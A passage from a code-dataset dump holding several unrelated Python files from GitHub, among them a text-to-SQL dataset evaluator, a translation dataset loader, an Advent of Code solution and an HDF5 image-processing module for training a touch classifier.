len(self.examples)\n\n def __getitem__(self, idx) -> SpiderItem:\n return self.examples[idx]\n\n class Metrics:\n def __init__(self, dataset):\n self.dataset = dataset\n self.foreign_key_maps = {\n db_id: evaluation.build_foreign_key_map(schema.orig)\n for db_id, schema in self.dataset.schemas.items()\n }\n self.evaluator = evaluation.Evaluator(\n self.dataset.db_path, self.foreign_key_maps, \"match\"\n )\n self.results = []\n\n def add(self, item: SpiderItem, inferred_code: str):\n res = self.evaluator.evaluate_one(\n db_name=item.spider_schema.db_id,\n gold=item.query,\n predicted=inferred_code,\n )\n self.results.append(res)\n return res \n\n def evaluate_all(\n self, idx: int, item: SpiderItem, inferred_codes: Iterable[str]\n ) -> Tuple[int, list]:\n beams = [\n self.evaluator.evaluate_one(\n db_name=item.spider_schema.db_id,\n gold=item.query,\n predicted=inferred_code,\n )\n for inferred_code in inferred_codes\n ]\n return idx, beams\n\n def finalize(self) -> dict:\n self.evaluator.finalize()\n return {\n \"per_item\": self.results, \n \"total_scores\": self.evaluator.scores,\n }\n","repo_name":"hyc2026/text2sql","sub_path":"duorat/datasets/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42308394224","text":"import json\n\nimport numpy\nimport torch\nimport torch.utils.data as data\nfrom tqdm import tqdm\n\nfrom . 
import ptext\n\n\nclass MLTDataSet(data.Dataset):\n\n def __init__(self, data_path, vocab_path) -> None:\n super().__init__()\n self.lang1, self.lang2 = ptext.parse(data_path)\n vocab = {}\n with open(vocab_path, 'r', encoding='utf-8') as fd:\n vocab = json.load(fd)\n self.input = [[vocab['lang1']['SOS'],\n *[vocab['lang1'][token] for token in line],\n vocab['lang1']['EOS']] for line in tqdm(self.lang1, desc='Converting Text to Index for input')]\n # not adding SOS in target as it does not need to be predicted\n self.target = [[*[vocab['lang2'][token] for token in line],\n vocab['lang2']['EOS']]\n for line in tqdm(self.lang2, desc='Converting Text to Index for target')]\n self.start_id = vocab['lang1']['SOS']\n self.end_id = vocab['lang1']['EOS']\n self.vocab = vocab\n self.index_to_token_target = {item[1]: item[0] for item in vocab['lang2'].items()}\n print('Vocab Size-{}'.format(self.get_input_size()))\n\n def __getitem__(self, index: int):\n return index, self.input[index], self.target[index]\n\n def __len__(self) -> int:\n return len(self.input)\n\n def get_start_end(self):\n return self.start_id, self.end_id\n\n def get_input_size(self):\n return len(self.vocab['lang1']), len(self.vocab['lang2'])\n\n def save_evaluated(self, answ, indx, loss, eval_filename):\n with open(eval_filename, 'w', encoding='utf-8') as fd:\n pred = []\n for itr, ind in enumerate(indx):\n pred.append({\n 'input': ' '.join(self.lang1[ind]),\n 'target': ' '.join(self.lang2[ind]),\n 'predicted': ' '.join([self.index_to_token_target[i] for i in answ[itr]])\n })\n pred.append({\n 'loss': loss\n })\n json.dump(pred, fd, indent=4, ensure_ascii=False)\n","repo_name":"nikhilkarnwal/CVML","sub_path":"ailabs/nlp/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3143941842","text":"from sklearn.model_selection import ParameterGrid\n\ndataset_params = list(ParameterGrid(\n dict(\n drugs_file=[None],\n data_file=['/home/rogia/datasets/drugbank.csv'],\n dataset_name=['drugbank'],\n transform=['SmilesToSeq'],\n min_count=[0],\n num_rounds=[1], # aller jusqu,a 10\n debug=[True]\n )\n))\n\nexpt_config = dict(\n dataset_params=dataset_params,\n pretrained_model_path=[\n \"/home/rogia/Documents/git/RuRe/baselines_with_rand/conv1d_08b11d7789e62972bd51acf10d382f3100cd8e6c\"]\n)\n","repo_name":"srkpa/SMRDDI","sub_path":"configs/test_baseline_with_rand.py","file_name":"test_baseline_with_rand.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"91327089","text":"\"\"\"https://adventofcode.com/2021/day/13#part2\"\"\"\n\nimport re\nimport numpy as np\nfrom imageio import imwrite\n\ndata = open(\"day-13/input\", \"r\", encoding=\"utf-8\").read()\ncoords_section, folds_section = data.split(\"\\n\\n\")\ncoords = {tuple(map(int, c.split(\",\"))) for c in coords_section.splitlines()}\nfolds = [re.match(r\"fold along (x|y)=(\\d+)\", f).groups() for f in folds_section.splitlines()]\nfolds = [(a, int(v)) for a, v in folds]\n\nfor axis, v in folds:\n if axis == 'y':\n coords = {(x, y) for x, y in coords if y < v} | {(x, v - (y - v)) for x, y in coords if y >= v}\n elif axis == 'x':\n coords = {(x, y) for x, y in coords if x < v} | {(v - (x - v), y) for x, y in coords if x >= v}\n\nX, Y = max(c[0] for c in coords), max(c[1] for c in coords)\ngrid = np.zeros((X + 1, Y + 1), dtype=int)\nfor c in coords:\n 
grid[c] = 1\nimwrite(\"day-13/grid.png\", grid.T)\n# CPJBERUL\n","repo_name":"ebouteillon/advent-of-code-2021","sub_path":"day-13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17022832691","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport h5py\nimport copy\nimport time\nimport os\nfrom whacc import utils\nfrom pathlib import Path\nimport warnings\nfrom tqdm.autonotebook import tqdm\nimport pdb\nfrom IPython.utils import io\n\n\n# def tqdm_import_helper():\n# with io.capture_output() as captured: # prevent crazy printing\n# from tqdm.notebook import tqdm\n# try:\n# for k in tqdm(range(1)):\n# pass\n# return True and isnotebook()\n# except:\n# return False\n\ndef isnotebook():\n try:\n c = str(get_ipython().__class__)\n shell = get_ipython().__class__.__name__\n if 'colab' in c:\n return True\n elif shell == 'ZMQInteractiveShell':\n return True # Jupyter notebook or qtconsole\n elif shell == 'TerminalInteractiveShell':\n return False # Terminal running IPython\n else:\n return False # Other type (?)\n except NameError:\n return False # Probably standard Python interpreter\n\n\n# if tqdm_import_helper():\n# from tqdm.notebook import tqdm\n# else:\n# from tqdm import tqdm\n\ndef stack_imgs_lag(imgs, frames_1=None, buffer=2, shift_to_the_right_by=0):\n if frames_1 is None:\n frames_1 = [imgs.shape[0]]\n array_group = []\n for k1, k2 in utils.loop_segments(frames_1):\n x = (np.random.random(imgs[0].shape) * 255).astype(np.uint8)\n tile_axes = [1] * len(x.shape) + [buffer]\n x = np.tile(x[:, :, None], tile_axes)\n tmp1 = x.copy()\n for ii, stack_i in enumerate(range(k1, k2)):\n x = np.concatenate((x, imgs[stack_i][:, :, None]), axis=2)\n x = np.concatenate((x, tmp1), axis=2)\n for k3 in range(k2 - k1):\n array_group.append(x[:, :, k3 + shift_to_the_right_by: k3 + 1 + buffer + shift_to_the_right_by])\n return np.asarray(array_group)\n\n\ndef get_h5_key_and_concatenate(h5_list, key_name='labels'):\n \"\"\"\n simply extract and concatenate all of one key \"key_name\" from many H5 files, I use it to help balance the data between touch\n and not-touch frames when training a model with a list of different H5 files\n Parameters\n ----------\n h5_list : list\n list of full paths to H5 file(s).\n key_name : str\n default 'labels', the key to get the data from the H5 file\n\n \"\"\"\n h5_list = utils.make_list(h5_list, suppress_warning=True)\n for i, k in enumerate(h5_list):\n with h5py.File(k, 'r') as h:\n try:\n x = h[key_name][:]\n except:\n x = h[key_name]\n\n if i == 0:\n out = np.asarray(x)\n else:\n out = np.concatenate((out, x))\n return out\n\n\ndef get_h5_key_and_dont_concatenate(h5_list, key_name='labels'):\n \"\"\"\n simply extract all of one key \"key_name\" from many H5 files without concatenating (returns one list per file), I use it to help balance the data between touch\n and not-touch frames when training a model with a list of different H5 files\n Parameters\n ----------\n h5_list : list\n list of full paths to H5 file(s).\n key_name : str\n default 'labels', the key to get the data from the H5 file\n\n \"\"\"\n out = []\n for i, k in enumerate(h5_list):\n with h5py.File(k, 'r') as h:\n out.append(list(h[key_name][:]))\n return out\n\n\ndef clone_h5_basic_info(H5_list, fold_name=None, file_end='_QUICK_SAVE.h5'):\n \"\"\"\n copies all the info from H5 into another H5 file NOT INCLUDING the labels or images. 
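\n A minimal usage sketch (the paths here are hypothetical):\n\n all_new_h5s = clone_h5_basic_info(['/data/session_1.h5'], fold_name='/data/clones')\n\n 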
It keeps all the file info,\n like names, pole locations, and the pole template match max value stack. Anything with 'images', 'MODEL__' or 'labels' is\n not copied over to the new file.\n Parameters\n ----------\n H5_list : list\n list of H5 files to clone\n fold_name : str\n default None, where to place the cloned H5 files. if left blank it will place in the same folder as the original file\n file_end : str\n default '_QUICK_SAVE.h5', how to change the name of the H5 file to be cloned to differentiate it from the original\n Returns\n -------\n all_new_h5s: list\n list of new H5 full file names\n \"\"\"\n if fold_name is not None:\n try:\n os.mkdir(fold_name)\n except:\n pass\n all_new_h5s = []\n\n for h5 in H5_list:\n if fold_name is not None:\n new_fn = fold_name + os.path.sep + os.path.basename(h5)[:-3] + file_end\n else: #\n new_fn = os.path.dirname(h5) + os.path.sep + os.path.basename(h5)[:-3] + file_end\n all_new_h5s.append(new_fn)\n try:\n os.remove(new_fn)\n except:\n pass\n with h5py.File(new_fn, 'w') as f1:\n with h5py.File(h5, 'r') as f2:\n for i, k in enumerate(f2.keys()):\n if 'images' != k and 'MODEL__' not in k and 'labels' not in k:\n f1.create_dataset(k, data=f2[k][:])\n f2.close()\n f1.close()\n return all_new_h5s\n\n\ndef del_h5_with_term(h5_list, str_2_cmp):\n \"\"\"\n Parameters\n ----------\n h5_list : list\n list of H5 strings (full path)\n str_2_cmp : str\n will delete keys with this in their title ... e.g. '__RETRAIN'\n \"\"\"\n for k2 in h5_list:\n with h5py.File(k2, 'a') as h5_source:\n for k in h5_source.keys():\n if str_2_cmp in k:\n print('del--> ' + k)\n del h5_source[k]\n print('_______')\n\n\ndef split_h5_loop_segments(h5_to_split_list, split_percentages, temp_base_name, chunk_size=10000,\n add_numbers_to_name=True,\n disable_TQDM=False, set_seed=None, color_channel=True, force_random_each_frame=False):\n \"\"\"Randomly splits images from a list of H5 file(s) into len(split_percentages) different H5 files.\n\n Parameters\n ----------\n h5_to_split_list : list\n list of strings with full file names to the H5 file(s) to be split\n split_percentages : list\n list of numbers, can be ints [20, 1, 1] and or floats [.8, .2], it simply takes the sum and creates a percentage\n temp_base_name : str or list\n full path to new h5 file e.g \"'/Users/phil/tempH5_\" and the program will add the number and the \".h5\"\n in this case tempH5_0.h5, tempH5_1.h5, tempH5_2.h5 etc. or if it is a list it must be equal in length to\n 'split_percentages' and each file will be named based on that list\n chunk_size : int\n default 10000, max amount of frames to hold in memory at a time before storing in H5 file. 
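For scale (a back-of-envelope estimate, assuming single-channel 61 x 61 uint8 frames): 10,000 frames occupy roughly 61 * 61 * 10000 bytes, about 37 MB, so the default is conservative.\n 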
Should almost never\n be an issue but just in case you can set to a lower value if you experience memory issues.\n add_numbers_to_name = bool\n default true, just in case you don't want the numbers on the end of your h5 file.\n Returns\n Examples\n --------\n from whacc import image_tools, utils\n h5_to_split_list = \"/Users/phil/Downloads/untitled folder 2/AH0000x000000_small_tester.h5\"\n h5_to_split_list = [h5_to_split_list]\n utils.print_h5_keys(h5_to_split_list[0])\n bd = '/Users/phil/Downloads/untitled folder 2/'\n image_tools.split_h5_loop_segments(h5_to_split_list, [1, 3], [bd+'TRASH', bd+'TRASH2'], chunk_size=10000, add_numbers_to_name=False,\n disable_TQDM=False, set_seed = None)\n -------\n \"\"\"\n if isinstance(temp_base_name, str):\n temp_base_name = [temp_base_name] * len(split_percentages)\n else:\n assert len(temp_base_name) == len(\n split_percentages), \"\"\"if 'temp_base_name' is a list of strings, it must be equal in length to 'split_percentages'\"\"\"\n\n for i, k in enumerate(temp_base_name):\n if k[-3:] == '.h5':\n temp_base_name[i] = temp_base_name[i][:-3]\n\n frame_num_array_list = get_h5_key_and_dont_concatenate(h5_to_split_list, 'frame_nums')\n if force_random_each_frame:\n for i, k in enumerate(frame_num_array_list):\n frame_num_array_list[i] = list(np.ones(np.sum(k)).astype(int))\n\n total_frames = len(get_h5_key_and_concatenate(h5_to_split_list, key_name='labels'))\n cnt1 = 0\n h5_creators = dict()\n split_percentages = split_percentages / np.sum(split_percentages)\n # assert(sum(split_percentages)==1)\n final_names = []\n for iii, h5_to_split in enumerate(h5_to_split_list):\n with h5py.File(h5_to_split, 'r') as h:\n tmp_frame_list = frame_num_array_list[iii]\n L = len(tmp_frame_list)\n\n if set_seed is not None:\n np.random.seed(set_seed)\n mixed_inds = np.random.choice(L, L, replace=False)\n\n random_segment_inds = np.split(mixed_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int'))\n random_segment_inds = [sorted(tmpk) for tmpk in random_segment_inds]\n random_frame_inds = [[None]] * len(random_segment_inds)\n list_of_new_frame_nums = [[None]] * len(random_segment_inds)\n loop_seg_list = list(utils.loop_segments(tmp_frame_list))\n for pi, p in enumerate(random_segment_inds):\n tmp1 = []\n tmp2 = []\n for pp in p:\n x = list(loop_seg_list[pp])\n tmp1 += list(range(x[0], x[1]))\n tmp2.append(tmp_frame_list[pp])\n random_frame_inds[pi] = tmp1\n list_of_new_frame_nums[pi] = tmp2\n\n for i, k in enumerate(split_percentages): # for each new h5 created\n if iii == 0: # create the H5 creators\n if add_numbers_to_name:\n final_names.append(temp_base_name[i] + '_' + str(i) + '.h5')\n else:\n final_names.append(temp_base_name[i] + '.h5')\n h5_creators[i] = h5_iterative_creator(final_names[-1],\n overwrite_if_file_exists=True,\n close_and_open_on_each_iteration=True,\n color_channel=color_channel)\n ims = []\n labels = []\n for ii in tqdm(sorted(random_frame_inds[i]), disable=disable_TQDM, total=total_frames, initial=cnt1):\n cnt1 += 1\n ims.append(h['images'][ii])\n labels.append(h['labels'][ii])\n if ii > 0 and ii % chunk_size == 0:\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n ims = []\n labels = []\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n with h5py.File(h5_creators[i].h5_full_file_name,\n 'r+') as h2: # wanted to do this to allow NONE as input and still have frame nums, but I need to have an append after creating and its a pain\n frame_nums = np.asarray(list_of_new_frame_nums[i])\n if 'frame_nums' not in 
h2.keys():\n h2.create_dataset('frame_nums', shape=np.shape(frame_nums), maxshape=(None,), chunks=True,\n data=frame_nums)\n else:\n h2['frame_nums'].resize(h2['frame_nums'].shape[0] + frame_nums.shape[0], axis=0)\n h2['frame_nums'][-frame_nums.shape[0]:] = frame_nums\n # # add the frame info to each\n # for i, frame_nums in enumerate(list_of_new_frame_nums):\n # with h5py.File(h5_creators[i].h5_full_file_name, 'r+') as h:\n # h.create_dataset('frame_nums', shape=np.shape(frame_nums), data=frame_nums)\n return final_names\n\n\ndef make_sure_frame_nums_exist(h5file):\n with h5py.File(h5file, 'r+') as h:\n key_list = list(h.keys())\n if 'frame_nums' in key_list:\n print(\"\"\"'frame_nums' already in the key list\"\"\")\n return None\n if 'trial_nums_and_frame_nums' not in key_list:\n print(\n \"\"\"key 'trial_nums_and_frame_nums' must be in the provided h5 this is the only reason program exists\"\"\")\n return None\n frame_nums = h['trial_nums_and_frame_nums'][1, :]\n h.create_dataset('frame_nums', shape=np.shape(frame_nums), data=frame_nums)\n\n\ndef split_h5(h5_to_split_list, split_percentages, temp_base_name, chunk_size=10000, add_numbers_to_name=True,\n disable_TQDM=False, skip_if_label_is_neg_1=False, set_seed=None, color_channel=True):\n \"\"\"Randomly splits images from a list of H5 file(s) into len(split_percentages) different H5 files.\n\n Parameters\n ----------\n h5_to_split_list : list\n list of strings with full file names to the H5 file(s) to be split\n split_percentages : list\n list of numbers, can be ints [20, 1, 1] and or floats [.8, .2], it simply takes the sum and creates a percentage\n temp_base_name : str or list\n full path to new h5 file e.g \"'/Users/phil/tempH5_\" and the program will add the number and the \".h5\"\n in this case tempH5_0.h5, tempH5_1.h5, tempH5_2.h5 etc. or if it is a list it must be equal in length to\n 'split_percentages' and each file will be named based on that list\n chunk_size = int\n default 10000, max amount of frames to hold in memory at a time before storing in H5 file. 
Should almost never\n be an issue but just in case you can set to a lower value if you experience memory issues.\n add_numbers_to_name : bool\n default true, just in case you don't want the numbers on the end of your h5 file.\n Returns\n -------\n \"\"\"\n if isinstance(temp_base_name, str):\n temp_base_name = [temp_base_name] * len(split_percentages)\n else:\n assert len(temp_base_name) == len(\n split_percentages), \"\"\"if 'temp_base_name' is a list of strings, it must be equal in length to 'split_percentages'\"\"\"\n total_frames = len(get_h5_key_and_concatenate(h5_to_split_list, key_name='labels'))\n cnt1 = 0\n h5_creators = dict()\n split_percentages = split_percentages / np.sum(split_percentages)\n # assert(sum(split_percentages)==1)\n final_names = []\n for iii, h5_to_split in enumerate(h5_to_split_list):\n with h5py.File(h5_to_split, 'r') as h:\n L = len(h['labels'][:])\n if set_seed is not None:\n np.random.seed(set_seed)\n mixed_inds = np.random.choice(L, L, replace=False)\n if skip_if_label_is_neg_1: # drop frames whose label is -1 (the shuffled indices themselves are never -1, so filter on the labels)\n all_labels = np.asarray(h['labels'][:])\n mixed_inds = mixed_inds[all_labels[mixed_inds] != -1]\n random_frame_inds = np.split(mixed_inds, np.ceil(L * np.cumsum(split_percentages[:-1])).astype('int'))\n for i, k in enumerate(split_percentages):\n if iii == 0: # create the H5 creators\n if add_numbers_to_name:\n final_names.append(temp_base_name[i] + '_' + str(i) + '.h5')\n else:\n final_names.append(temp_base_name[i] + '.h5')\n h5_creators[i] = h5_iterative_creator(final_names[-1],\n overwrite_if_file_exists=True,\n close_and_open_on_each_iteration=True,\n color_channel=color_channel)\n ims = []\n labels = []\n # print('starting ' + str(iii*i + 1) + ' of ' + str(len(split_percentages)*len(h5_to_split_list)))\n for ii in tqdm(sorted(random_frame_inds[i]), disable=disable_TQDM, total=total_frames, initial=cnt1):\n cnt1 += 1\n ims.append(h['images'][ii])\n labels.append(h['labels'][ii])\n if ii > 0 and ii % chunk_size == 0:\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n ims = []\n labels = []\n h5_creators[i].add_to_h5(np.asarray(ims), np.asarray(labels))\n return final_names\n\n\nclass h5_iterative_creator():\n \"\"\"Create an H5 file using a for loop easily. 
used to create the augmented H5 file for training\n \n Attributes:\n\n Parameters\n ----------\n h5_new_full_file_name : string\n full path name to your H5 file to be created\n overwrite_if_file_exists : bool\n overwrites the h5 file if it already exists\n max_img_height : int\n default 61, only the max size, can be larger in case you are going to have larger images\n max_img_width : int\n default 61, only the max size, can be larger in case you are going to have larger images\n close_and_open_on_each_iteration : bool\n default True, this prevents the user from forgetting to close H5 which\n can lead to corruption.\n\n Example\n _______\n h5creator = h5_iterative_creator(new_H5_file)\n h5creator.add_to_h5(img_stack1, labels_stack1)\n h5creator.add_to_h5(img_stack2, labels_stack2)\n h5creator.add_to_h5(img_stack3, labels_stack3)\n\n \"\"\"\n\n def __init__(self, h5_new_full_file_name,\n overwrite_if_file_exists=False,\n max_img_height=61,\n max_img_width=61,\n close_and_open_on_each_iteration=True,\n color_channel=True,\n add_to_existing_H5=False,\n ignore_image_range_warning=False,\n dtype_img=h5py.h5t.STD_U8BE,\n dtype_labels=h5py.h5t.STD_I32LE,\n image_key_name = 'images',\n label_key_name = 'labels'):\n self.img_key = image_key_name\n self.label_key_name = label_key_name\n self.dtype_img = dtype_img\n self.dtype_labels = dtype_labels\n self.ignore_image_range_warning = ignore_image_range_warning # honor the argument instead of hard-coding False\n self.max_shape = None\n if not close_and_open_on_each_iteration:\n print('**remember to CLOSE the H5 file when you are done!!!**')\n if overwrite_if_file_exists and os.path.isfile(h5_new_full_file_name):\n os.remove(h5_new_full_file_name)\n self.h5_full_file_name = h5_new_full_file_name\n if add_to_existing_H5:\n self.hf_file = h5py.File(h5_new_full_file_name, \"r+\")\n else:\n self.hf_file = h5py.File(h5_new_full_file_name, \"w\")\n self.color_channel = color_channel\n self.max_img_height = max_img_height\n self.max_img_width = max_img_width\n self._went_through_create_h5 = False\n self.close_it = close_and_open_on_each_iteration\n if self.close_it:\n self.hf_file.close()\n\n def add_to_h5(self, images, labels):\n \"\"\"\n Parameters\n ----------\n images : numpy tensor\n chunk of images\n labels : numpy array\n array of labels\n \"\"\"\n if self.close_it:\n self.open_or_close_h5('r+')\n if self._went_through_create_h5: # already initialized with the correct size\n self._add_next_chunk_to_h5(images, labels)\n else:\n self._create_h5(images, labels)\n if self.close_it:\n self.open_or_close_h5('close')\n\n def check_images_uint8(self, images):\n if not self.ignore_image_range_warning:\n min_img = np.min(images)\n max_img = np.max(images)\n if min_img < 0 or max_img > 255:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n if -1 <= min_img <= 1 and -1 <= max_img <= 1:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n warnings.warn('it seems your values may be formatted between -1 and 1')\n if 0 <= min_img <= 1 and 0 <= max_img <= 1:\n warnings.warn(\n 'image data must be uint8 compatible, 0 to 255, but given range is ' + str(min_img) + ' to ' + str(\n max_img))\n warnings.warn('it seems your values may be formatted between 0 and 1')\n\n def _create_h5(self, images, labels):\n \"\"\"\n Parameters\n ----------\n images :\n\n labels :\n\n \"\"\"\n self.check_images_uint8(images)\n if self.max_shape is None:\n # max_shape = (None, self.max_img_height, 
self.max_img_width, 3)\n max_shape = list(images.shape)\n max_shape[0] = None\n\n # if set_multiplier:\n self.hf_file.create_dataset(\"multiplier\", [1], h5py.h5t.STD_I32LE, data=images.shape[0])\n if self.color_channel:\n self.hf_file.create_dataset(self.img_key,\n np.shape(images),\n self.dtype_img,\n # jk need this to not explode the size of the data... commented this out because I wanted to use not 0-255 numbers\n maxshape=max_shape,\n chunks=True,\n data=images)\n else:\n self.hf_file.create_dataset(self.img_key,\n np.shape(images),\n self.dtype_img,\n # jk need this to not explode the size of the data... commented this out because I wanted to use not 0-255 numbers\n maxshape=max_shape,\n chunks=True,\n data=images)\n self.hf_file.create_dataset(self.label_key_name,\n np.shape(labels),\n self.dtype_labels, # ....... commented this out because we may want floats....\n maxshape=(None,),\n chunks=True,\n data=labels)\n self._went_through_create_h5 = True\n\n def _add_next_chunk_to_h5(self, images, labels):\n \"\"\"\n\n Parameters\n ----------\n images :\n\n labels :\n \n\n Returns\n -------\n\n \n \"\"\"\n self.check_images_uint8(images)\n self.hf_file[self.img_key].resize(self.hf_file[self.img_key].shape[0] + images.shape[0], axis=0)\n self.hf_file[self.label_key_name].resize(self.hf_file[self.label_key_name].shape[0] + labels.shape[0], axis=0)\n\n self.hf_file[self.img_key][-images.shape[0]:] = images\n self.hf_file[self.label_key_name][-labels.shape[0]:] = labels\n\n def read_h5(self):\n \"\"\" \"\"\"\n self.open_or_close_h5('r')\n print('''**remember to CLOSE the H5 file when you are done!!!** with \".close_h5()\" method''')\n\n def close_h5(self):\n \"\"\" \"\"\"\n self.open_or_close_h5('close')\n print('H5 file was closed')\n\n def open_or_close_h5(self, mode_='r'):\n \"\"\"\n\n Parameters\n ----------\n mode_ : str\n mode can be H5py modes 'r', 'r+' 'w' (w overwrites file!) etc OR 'close' to\n # ensure it is closed. separate function to prevent a bunch of try statements (Default value = 'r')\n\n Returns\n -------\n\n \n \"\"\"\n try:\n self.hf_file.close()\n finally:\n if mode_.lower() != 'close':\n self.hf_file = h5py.File(self.h5_full_file_name, mode_)\n\n\n#\ndef augment_helper(keras_datagen, num_aug_ims, num_reg_ims, in_img, in_label):\n \"\"\"\n\n Parameters\n ----------\n keras_datagen : keras.preprocessing.image.ImageDataGenerator\n from keras.preprocessing.image import ImageDataGenerator -- keras_datagen = ImageDataGenerator(...)\n num_aug_ims : int\n number of augmented images to generate from a single input image\n num_reg_ims : int\n number of copies of in_img (original) to produce for output. will be stacked at the beginning of the all_augment variable.\n Use it to see the augmentation when testing; it can be useful if splitting into many H5s if you want an original in each.\n in_img : numpy array\n numpy array either 3D with color channel for the last dim or 2D\n in_label : int\n the label associated with in_img. 
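(A worked example of the repeat logic below: with num_reg_ims=2 and num_aug_ims=5 the returned stack holds 2 + 5 = 7 images, and out_labels repeats in_label 7 times.)\n 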
It is simply repeated to create 'out_labels', matching the size of 'all_augment'\n\n Returns\n -------\n\n \n \"\"\"\n if len(in_img.shape) == 2: # or not np.any(np.asarray(in_img.shape)==3)\n in_img = np.repeat(in_img[..., np.newaxis], 3, -1) # for 2D arrays without color channels\n set_zoom = keras_datagen.zoom_range\n in_img = np.expand_dims(in_img, 0)\n\n it = keras_datagen.flow(in_img, batch_size=1)\n all_augment = np.tile(in_img, [num_reg_ims, 1, 1, 1])\n for i in range(num_aug_ims): ##\n if set_zoom != [0, 0]: # if zoom is being used...\n # keras 'zoom' is annoying. it zooms x and y differently randomly\n # in order to get an equal zoom I use the following workaround.\n z_val = np.random.uniform(low=set_zoom[0], high=set_zoom[1])\n keras_datagen.zoom_range = [z_val, z_val]\n it = keras_datagen.flow(in_img, batch_size=1)\n batch = it.next()\n image = batch[0].astype('uint8')\n all_augment = np.append(all_augment, np.expand_dims(image, 0), 0)\n out_labels = np.repeat(in_label, sum([num_aug_ims, num_reg_ims]))\n keras_datagen.zoom_range = set_zoom\n return all_augment, out_labels\n\n\ndef img_unstacker(img_array, num_frames_wide=8, color_channel=True):\n \"\"\"unstacks image stack and combines them into one large image for easy display. reads left to right and then top to bottom.\n\n Parameters\n ----------\n img_array : numpy array\n stacked image array\n num_frames_wide : int\n width of destacked image. if = 8 with input 20 images it will be 8 wide 3 long and 4 blank images (Default value = 8)\n\n Returns\n -------\n\n \n \"\"\"\n im_stack = None\n for i, k in enumerate(img_array):\n if i % num_frames_wide == 0:\n if i != 0: # stack it\n if im_stack is None:\n im_stack = im_stack_tmp\n else:\n im_stack = np.vstack((im_stack, im_stack_tmp))\n im_stack_tmp = k # must be at the end\n else:\n im_stack_tmp = np.hstack((im_stack_tmp, k))\n x = num_frames_wide - len(img_array) % num_frames_wide\n if x != 0:\n if x != num_frames_wide:\n for i in range(x):\n im_stack_tmp = np.hstack((im_stack_tmp, np.ones_like(k)))\n if im_stack is None:\n return im_stack_tmp\n else:\n im_stack = np.vstack((im_stack, im_stack_tmp))\n return im_stack\n\n\ndef original_image(x):\n \"\"\"This is used to transform batch generated images [-1 1] to the original image [0,255] for plotting\n\n Parameters\n ----------\n x :\n \n\n Returns\n -------\n\n \n \"\"\"\n image = tf.cast((x + 1) * 127.5, tf.uint8)\n return image\n\n\ndef predict_multiple_H5_files(H5_file_list, model_2_load, append_model_and_labels_to_name_string=False,\n batch_size=1000, model_2_load_is_model=False, save_on=False,\n label_save_name=None, disable_TQDM=False,\n save_labels_to_this_h5_file_instead=None) -> object:\n \"\"\"\n\n Parameters\n ----------\n H5_file_list : list\n list of string(s) of H5 file full paths\n model_2_load : string or loaded model\n either full path to model folder ending with \".ckpt\" OR the loaded model itself. 
If the latter,\n the user MUST set \"model_2_load_is_model\" to True and \"label_save_name\" must be explicitly defined (when using a model\n path we use the model name to name the labels).\n append_model_and_labels_to_name_string : bool\n if True label_save_name = 'MODEL__' + label_save_name + '__labels', it is a simple way to keep track of labels\n from many models in a single H5 file. also makes it easier to find those labels for later processing. (Default value = False)\n batch_size : int\n number of images to process per batch, -- slower prediction speeds << ideal prediction speed <<\n memory issues and crashes -- 1000 is normally pretty good on Google CoLab (Default value = 1000)\n model_2_load_is_model : bool\n lets the program know if you are directly inserting a model (instead of a path to model folder) (Default value = False)\n save_on : bool\n saves to H5 file. either the original H5 (image source) or new H5 if a path to \"save_labels_to_this_h5_file_instead\"\n is given (Default value = False)\n label_save_name : string\n h5 file key used to save the labels to, default is 'MODEL__' + **model_name** + '__labels'\n disable_TQDM : bool\n if True, turns off loading progress bar. (Default value = False)\n save_labels_to_this_h5_file_instead : string\n full path to H5 file to insert labels into instead of the H5 used as the image source (Default value = None)\n\n Returns\n -------\n\n \n \"\"\"\n for i, H5_file in enumerate(H5_file_list):\n # save_what_is_left_of_your_h5_file(H5_file, do_del_and_rename = 1) # only matters if file is corrupt otherwise doesn't touch it\n\n gen = ImageBatchGenerator(batch_size, [H5_file])\n\n if model_2_load_is_model:\n if label_save_name is None and save_on == True:\n assert 1 == 0, 'label_save_name must be assigned if you are loading a model in directly and save_on == True.'\n model = model_2_load\n else:\n if label_save_name is None:\n label_save_name = model_2_load.split(os.path.sep)[-1].split('.')[0]\n label_save_name = 'MODEL__' + label_save_name + '__labels'\n append_model_and_labels_to_name_string = False # turn off because defaults to this naming scheme if user doesn't put in name\n model = tf.keras.models.load_model(model_2_load)\n\n if append_model_and_labels_to_name_string:\n label_save_name = 'MODEL__' + label_save_name + '__labels'\n\n start = time.time()\n labels_2_save = np.asarray([])\n\n for k in tqdm(range(gen.__len__()), disable=disable_TQDM):\n TMP_X, tmp_y = gen.getXandY(k)\n outY = model.predict(TMP_X)\n labels_2_save = np.append(labels_2_save, outY)\n total_seconds = time.time() - start\n time_per_mil = np.round(1000000 * total_seconds / len(labels_2_save))\n print(str(time_per_mil) + ' seconds per 1 million images predicted')\n\n if save_on:\n if save_labels_to_this_h5_file_instead is not None: # add to different H5 file\n H5_file = save_labels_to_this_h5_file_instead # otherwise it will add to the current H5 file\n # based on the loop through \"H5_file_list\" above\n try:\n hf.close()\n except:\n pass\n with h5py.File(H5_file, 'r+') as hf:\n try:\n del hf[label_save_name]\n time.sleep(10) # give time to process the deleted file... 
